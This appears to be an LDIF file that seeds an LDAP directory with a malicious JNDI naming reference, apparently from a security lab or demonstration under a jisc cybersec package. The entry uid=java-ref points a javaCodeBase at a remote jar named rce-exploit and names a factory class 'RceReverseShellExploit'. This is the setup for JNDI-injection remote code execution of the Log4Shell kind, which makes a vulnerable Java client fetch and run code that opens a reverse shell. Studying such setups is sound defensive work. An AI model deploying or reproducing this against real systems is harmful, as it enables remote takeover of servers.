dn: dc=jisc,dc=ac,dc=uk
objectclass: top
objectclass: domain
objectclass: extensibleObject
dc: jisc


dn: ou=people,dc=jisc,dc=ac,dc=uk
objectclass: top
objectclass: organizationalUnit
ou: people


dn: uid=java-ref,ou=people,dc=jisc,dc=ac,dc=uk
objectclass: top
objectclass: javaContainer
objectclass: javaObject
objectclass: javaNamingReference
javaCodeBase: http://localhost:8080/rce/rce-exploit-0.0.1-SNAPSHOT.jar
javaClassName: uk.ac.jisc.cybersec.rce.RceReverseShellExploit
javaFactory: uk.ac.jisc.cybersec.rce.RceReverseShellExploit
cn: Java Class
sn: Class
uid: java-ref